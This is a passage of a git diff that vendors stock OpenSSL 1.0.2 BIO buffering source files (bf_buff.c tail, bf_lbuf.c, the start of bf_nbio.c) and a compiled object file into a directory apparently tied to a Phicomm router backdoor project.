+    BIO_F_BUFFER_CTX *ctx;
+    long ret = 1;
+    char *p1, *p2;
+    int r, i, *ip;
+    int ibs, obs;
+
+    ctx = (BIO_F_BUFFER_CTX *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ctx->ibuf_off = 0;
+        ctx->ibuf_len = 0;
+        ctx->obuf_off = 0;
+        ctx->obuf_len = 0;
+        if (b->next_bio == NULL)
+            return (0);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_INFO:
+        ret = (long)ctx->obuf_len;
+        break;
+    case BIO_C_GET_BUFF_NUM_LINES:
+        ret = 0;
+        p1 = ctx->ibuf;
+        for (i = 0; i < ctx->ibuf_len; i++) {
+            if (p1[ctx->ibuf_off + i] == '\n')
+                ret++;
+        }
+        break;
+    case BIO_CTRL_WPENDING:
+        ret = (long)ctx->obuf_len;
+        if (ret == 0) {
+            if (b->next_bio == NULL)
+                return (0);
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        }
+        break;
+    case BIO_CTRL_PENDING:
+        ret = (long)ctx->ibuf_len;
+        if (ret == 0) {
+            if (b->next_bio == NULL)
+                return (0);
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        }
+        break;
+    case BIO_C_SET_BUFF_READ_DATA:
+        if (num > ctx->ibuf_size) {
+            p1 = OPENSSL_malloc((int)num);
+            if (p1 == NULL)
+                goto malloc_error;
+            if (ctx->ibuf != NULL)
+                OPENSSL_free(ctx->ibuf);
+            ctx->ibuf = p1;
+        }
+        ctx->ibuf_off = 0;
+        ctx->ibuf_len = (int)num;
+        memcpy(ctx->ibuf, ptr, (int)num);
+        ret = 1;
+        break;
+    case BIO_C_SET_BUFF_SIZE:
+        if (ptr != NULL) {
+            ip = (int *)ptr;
+            if (*ip == 0) {
+                ibs = (int)num;
+                obs = ctx->obuf_size;
+            } else {            /* if (*ip == 1) */
+
+                ibs = ctx->ibuf_size;
+                obs = (int)num;
+            }
+        } else {
+            ibs = (int)num;
+            obs = (int)num;
+        }
+        p1 = ctx->ibuf;
+        p2 = ctx->obuf;
+        if ((ibs > DEFAULT_BUFFER_SIZE) && (ibs != ctx->ibuf_size)) {
+            p1 = (char *)OPENSSL_malloc((int)num);
+            if (p1 == NULL)
+                goto malloc_error;
+        }
+        if ((obs > DEFAULT_BUFFER_SIZE) && (obs != ctx->obuf_size)) {
+            p2 = (char *)OPENSSL_malloc((int)num);
+            if (p2 == NULL) {
+                if (p1 != ctx->ibuf)
+                    OPENSSL_free(p1);
+                goto malloc_error;
+            }
+        }
+        if (ctx->ibuf != p1) {
+            OPENSSL_free(ctx->ibuf);
+            ctx->ibuf = p1;
+            ctx->ibuf_off = 0;
+            ctx->ibuf_len = 0;
+            ctx->ibuf_size = ibs;
+        }
+        if (ctx->obuf != p2) {
+            OPENSSL_free(ctx->obuf);
+            ctx->obuf = p2;
+            ctx->obuf_off = 0;
+            ctx->obuf_len = 0;
+            ctx->obuf_size = obs;
+        }
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        if (b->next_bio == NULL)
+            return (0);
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+
+    case BIO_CTRL_FLUSH:
+        if (b->next_bio == NULL)
+            return (0);
+        if (ctx->obuf_len <= 0) {
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+            break;
+        }
+
+        for (;;) {
+            BIO_clear_retry_flags(b);
+            if (ctx->obuf_len > 0) {
+                r = BIO_write(b->next_bio,
+                              &(ctx->obuf[ctx->obuf_off]), ctx->obuf_len);
+#if 0
+                fprintf(stderr, "FLUSH [%3d] %3d -> %3d\n", ctx->obuf_off,
+                        ctx->obuf_len, r);
+#endif
+                BIO_copy_next_retry(b);
+                if (r <= 0)
+                    return ((long)r);
+                ctx->obuf_off += r;
+                ctx->obuf_len -= r;
+            } else {
+                ctx->obuf_len = 0;
+                ctx->obuf_off = 0;
+                ret = 1;
+                break;
+            }
+        }
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_DUP:
+        dbio = (BIO *)ptr;
+        if (!BIO_set_read_buffer_size(dbio, ctx->ibuf_size) ||
+            !BIO_set_write_buffer_size(dbio, ctx->obuf_size))
+            ret = 0;
+        break;
+    default:
+        if (b->next_bio == NULL)
+            return (0);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+ malloc_error:
+    BIOerr(BIO_F_BUFFER_CTRL, ERR_R_MALLOC_FAILURE);
+    return (0);
+}
+
+static long buffer_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int buffer_gets(BIO *b, char *buf, int size)
+{
+    BIO_F_BUFFER_CTX *ctx;
+    int num = 0, i, flag;
+    char *p;
+
+    ctx = (BIO_F_BUFFER_CTX *)b->ptr;
+    size--;                     /* reserve space for a '\0' */
+    BIO_clear_retry_flags(b);
+
+    for (;;) {
+        if (ctx->ibuf_len > 0) {
+            p = &(ctx->ibuf[ctx->ibuf_off]);
+            flag = 0;
+            for (i = 0; (i < ctx->ibuf_len) && (i < size); i++) {
+                *(buf++) = p[i];
+                if (p[i] == '\n') {
+                    flag = 1;
+                    i++;
+                    break;
+                }
+            }
+            num += i;
+            size -= i;
+            ctx->ibuf_len -= i;
+            ctx->ibuf_off += i;
+            if (flag || size == 0) {
+                *buf = '\0';
+                return (num);
+            }
+        } else {                /* read another chunk */
+
+            i = BIO_read(b->next_bio, ctx->ibuf, ctx->ibuf_size);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+                *buf = '\0';
+                if (i < 0)
+                    return ((num > 0) ? num : i);
+                if (i == 0)
+                    return (num);
+            }
+            ctx->ibuf_len = i;
+            ctx->ibuf_off = 0;
+        }
+    }
+}
+
+static int buffer_puts(BIO *b, const char *str)
+{
+    return (buffer_write(b, str, strlen(str)));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_buff.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_buff.o
new file mode 100644
index 0000000000000000000000000000000000000000..c2d50059d19480ce7da6beff1e71e4051ba77e65
GIT binary patch
literal 7112
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_lbuf.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_lbuf.c
new file mode 100644
index 0000000..46d0d5a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_lbuf.c
@@ -0,0 +1,391 @@
+/* crypto/bio/bf_buff.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/bio.h>
+#include <openssl/evp.h>
+
+static int linebuffer_write(BIO *h, const char *buf, int num);
+static int linebuffer_read(BIO *h, char *buf, int size);
+static int linebuffer_puts(BIO *h, const char *str);
+static int linebuffer_gets(BIO *h, char *str, int size);
+static long linebuffer_ctrl(BIO *h, int cmd, long arg1, void *arg2);
+static int linebuffer_new(BIO *h);
+static int linebuffer_free(BIO *data);
+static long linebuffer_callback_ctrl(BIO *h, int cmd, bio_info_cb *fp);
+
+/* A 10k maximum should be enough for most purposes */
+#define DEFAULT_LINEBUFFER_SIZE 1024*10
+
+/* #define DEBUG */
+
+static BIO_METHOD methods_linebuffer = {
+    BIO_TYPE_LINEBUFFER,
+    "linebuffer",
+    linebuffer_write,
+    linebuffer_read,
+    linebuffer_puts,
+    linebuffer_gets,
+    linebuffer_ctrl,
+    linebuffer_new,
+    linebuffer_free,
+    linebuffer_callback_ctrl,
+};
+
+BIO_METHOD *BIO_f_linebuffer(void)
+{
+    return (&methods_linebuffer);
+}
+
+typedef struct bio_linebuffer_ctx_struct {
+    char *obuf;                 /* the output char array */
+    int obuf_size;              /* how big is the output buffer */
+    int obuf_len;               /* how many bytes are in it */
+} BIO_LINEBUFFER_CTX;
+
+static int linebuffer_new(BIO *bi)
+{
+    BIO_LINEBUFFER_CTX *ctx;
+
+    ctx = (BIO_LINEBUFFER_CTX *)OPENSSL_malloc(sizeof(BIO_LINEBUFFER_CTX));
+    if (ctx == NULL)
+        return (0);
+    ctx->obuf = (char *)OPENSSL_malloc(DEFAULT_LINEBUFFER_SIZE);
+    if (ctx->obuf == NULL) {
+        OPENSSL_free(ctx);
+        return (0);
+    }
+    ctx->obuf_size = DEFAULT_LINEBUFFER_SIZE;
+    ctx->obuf_len = 0;
+
+    bi->init = 1;
+    bi->ptr = (char *)ctx;
+    bi->flags = 0;
+    return (1);
+}
+
+static int linebuffer_free(BIO *a)
+{
+    BIO_LINEBUFFER_CTX *b;
+
+    if (a == NULL)
+        return (0);
+    b = (BIO_LINEBUFFER_CTX *)a->ptr;
+    if (b->obuf != NULL)
+        OPENSSL_free(b->obuf);
+    OPENSSL_free(a->ptr);
+    a->ptr = NULL;
+    a->init = 0;
+    a->flags = 0;
+    return (1);
+}
+
+static int linebuffer_read(BIO *b, char *out, int outl)
+{
+    int ret = 0;
+
+    if (out == NULL)
+        return (0);
+    if (b->next_bio == NULL)
+        return (0);
+    ret = BIO_read(b->next_bio, out, outl);
+    BIO_clear_retry_flags(b);
+    BIO_copy_next_retry(b);
+    return (ret);
+}
+
+static int linebuffer_write(BIO *b, const char *in, int inl)
+{
+    int i, num = 0, foundnl;
+    BIO_LINEBUFFER_CTX *ctx;
+
+    if ((in == NULL) || (inl <= 0))
+        return (0);
+    ctx = (BIO_LINEBUFFER_CTX *)b->ptr;
+    if ((ctx == NULL) || (b->next_bio == NULL))
+        return (0);
+
+    BIO_clear_retry_flags(b);
+
+    do {
+        const char *p;
+
+        for (p = in; p < in + inl && *p != '\n'; p++) ;
+        if (*p == '\n') {
+            p++;
+            foundnl = 1;
+        } else
+            foundnl = 0;
+
+        /*
+         * If a NL was found and we already have text in the save buffer,
+         * concatenate them and write
+         */
+        while ((foundnl || p - in > ctx->obuf_size - ctx->obuf_len)
+               && ctx->obuf_len > 0) {
+            int orig_olen = ctx->obuf_len;
+
+            i = ctx->obuf_size - ctx->obuf_len;
+            if (p - in > 0) {
+                if (i >= p - in) {
+                    memcpy(&(ctx->obuf[ctx->obuf_len]), in, p - in);
+                    ctx->obuf_len += p - in;
+                    inl -= p - in;
+                    num += p - in;
+                    in = p;
+                } else {
+                    memcpy(&(ctx->obuf[ctx->obuf_len]), in, i);
+                    ctx->obuf_len += i;
+                    inl -= i;
+                    in += i;
+                    num += i;
+                }
+            }
+#if 0
+            BIO_write(b->next_bio, "<*<", 3);
+#endif
+            i = BIO_write(b->next_bio, ctx->obuf, ctx->obuf_len);
+            if (i <= 0) {
+                ctx->obuf_len = orig_olen;
+                BIO_copy_next_retry(b);
+
+#if 0
+                BIO_write(b->next_bio, ">*>", 3);
+#endif
+                if (i < 0)
+                    return ((num > 0) ? num : i);
+                if (i == 0)
+                    return (num);
+            }
+#if 0
+            BIO_write(b->next_bio, ">*>", 3);
+#endif
+            if (i < ctx->obuf_len)
+                memmove(ctx->obuf, ctx->obuf + i, ctx->obuf_len - i);
+            ctx->obuf_len -= i;
+        }
+
+        /*
+         * Now that the save buffer is emptied, let's write the input buffer
+         * if a NL was found and there is anything to write.
+         */
+        if ((foundnl || p - in > ctx->obuf_size) && p - in > 0) {
+#if 0
+            BIO_write(b->next_bio, "<*<", 3);
+#endif
+            i = BIO_write(b->next_bio, in, p - in);
+            if (i <= 0) {
+                BIO_copy_next_retry(b);
+#if 0
+                BIO_write(b->next_bio, ">*>", 3);
+#endif
+                if (i < 0)
+                    return ((num > 0) ? num : i);
+                if (i == 0)
+                    return (num);
+            }
+#if 0
+            BIO_write(b->next_bio, ">*>", 3);
+#endif
+            num += i;
+            in += i;
+            inl -= i;
+        }
+    }
+    while (foundnl && inl > 0);
+    /*
+     * We've written as much as we can.  The rest of the input buffer, if
+     * any, is text that doesn't and with a NL and therefore needs to be
+     * saved for the next trip.
+     */
+    if (inl > 0) {
+        memcpy(&(ctx->obuf[ctx->obuf_len]), in, inl);
+        ctx->obuf_len += inl;
+        num += inl;
+    }
+    return num;
+}
+
+static long linebuffer_ctrl(BIO *b, int cmd, long num, void *ptr)
+{
+    BIO *dbio;
+    BIO_LINEBUFFER_CTX *ctx;
+    long ret = 1;
+    char *p;
+    int r;
+    int obs;
+
+    ctx = (BIO_LINEBUFFER_CTX *)b->ptr;
+
+    switch (cmd) {
+    case BIO_CTRL_RESET:
+        ctx->obuf_len = 0;
+        if (b->next_bio == NULL)
+            return (0);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_INFO:
+        ret = (long)ctx->obuf_len;
+        break;
+    case BIO_CTRL_WPENDING:
+        ret = (long)ctx->obuf_len;
+        if (ret == 0) {
+            if (b->next_bio == NULL)
+                return (0);
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        }
+        break;
+    case BIO_C_SET_BUFF_SIZE:
+        obs = (int)num;
+        p = ctx->obuf;
+        if ((obs > DEFAULT_LINEBUFFER_SIZE) && (obs != ctx->obuf_size)) {
+            p = (char *)OPENSSL_malloc((int)num);
+            if (p == NULL)
+                goto malloc_error;
+        }
+        if (ctx->obuf != p) {
+            if (ctx->obuf_len > obs) {
+                ctx->obuf_len = obs;
+            }
+            memcpy(p, ctx->obuf, ctx->obuf_len);
+            OPENSSL_free(ctx->obuf);
+            ctx->obuf = p;
+            ctx->obuf_size = obs;
+        }
+        break;
+    case BIO_C_DO_STATE_MACHINE:
+        if (b->next_bio == NULL)
+            return (0);
+        BIO_clear_retry_flags(b);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        BIO_copy_next_retry(b);
+        break;
+
+    case BIO_CTRL_FLUSH:
+        if (b->next_bio == NULL)
+            return (0);
+        if (ctx->obuf_len <= 0) {
+            ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+            break;
+        }
+
+        for (;;) {
+            BIO_clear_retry_flags(b);
+            if (ctx->obuf_len > 0) {
+                r = BIO_write(b->next_bio, ctx->obuf, ctx->obuf_len);
+#if 0
+                fprintf(stderr, "FLUSH %3d -> %3d\n", ctx->obuf_len, r);
+#endif
+                BIO_copy_next_retry(b);
+                if (r <= 0)
+                    return ((long)r);
+                if (r < ctx->obuf_len)
+                    memmove(ctx->obuf, ctx->obuf + r, ctx->obuf_len - r);
+                ctx->obuf_len -= r;
+            } else {
+                ctx->obuf_len = 0;
+                ret = 1;
+                break;
+            }
+        }
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    case BIO_CTRL_DUP:
+        dbio = (BIO *)ptr;
+        if (!BIO_set_write_buffer_size(dbio, ctx->obuf_size))
+            ret = 0;
+        break;
+    default:
+        if (b->next_bio == NULL)
+            return (0);
+        ret = BIO_ctrl(b->next_bio, cmd, num, ptr);
+        break;
+    }
+    return (ret);
+ malloc_error:
+    BIOerr(BIO_F_LINEBUFFER_CTRL, ERR_R_MALLOC_FAILURE);
+    return (0);
+}
+
+static long linebuffer_callback_ctrl(BIO *b, int cmd, bio_info_cb *fp)
+{
+    long ret = 1;
+
+    if (b->next_bio == NULL)
+        return (0);
+    switch (cmd) {
+    default:
+        ret = BIO_callback_ctrl(b->next_bio, cmd, fp);
+        break;
+    }
+    return (ret);
+}
+
+static int linebuffer_gets(BIO *b, char *buf, int size)
+{
+    if (b->next_bio == NULL)
+        return (0);
+    return (BIO_gets(b->next_bio, buf, size));
+}
+
+static int linebuffer_puts(BIO *b, const char *str)
+{
+    return (linebuffer_write(b, str, strlen(str)));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_nbio.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_nbio.c
new file mode 100644
index 0000000..da88a8a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bio/bf_nbio.c
@@ -0,0 +1,251 @@
+/* crypto/bio/bf_nbio.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <errno.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include <openssl/bio.h>
+
+/*
+ * BIO_put and BIO_get both add to the digest, BIO_gets returns the digest
+ */
+
+static int nbiof_write(BIO *h, const char *buf, int num);
